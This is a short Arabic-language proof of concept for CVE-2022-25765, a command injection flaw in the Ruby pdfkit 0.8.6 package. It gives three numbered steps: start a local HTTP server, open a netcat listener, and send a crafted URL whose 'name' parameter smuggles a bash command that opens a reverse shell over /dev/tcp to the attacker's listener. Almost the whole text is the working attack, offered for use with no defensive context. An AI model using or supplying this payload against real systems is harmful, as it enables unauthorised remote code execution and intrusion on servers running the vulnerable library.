
إثبات مفهوم لاستغلال CVE-2022-25765 يوضح حقن الأوامر في pdfkit 0.8.6 عبر معامل URL غير مُنقّى، مما يتيح تنفيذ الأكواد عن بُعد وفتح قشرة عكسية.
حزمة pdfkit منذ الإصدار 0.0.0 معرضة لثغرة حقن الأوامر، حيث لا يتم تنقية عنوان URL بشكل صحيح.
1- python3 -m http.server 80
2- nc -lnvp 'Target Port'
3- http://"TARGET_ADDRESS:Target PORT"//?name=#{'%20`bash -c 'exec bash -i &>/dev/tcp/"Target_ADRESS/LISTENING_PORT"<&1'`'}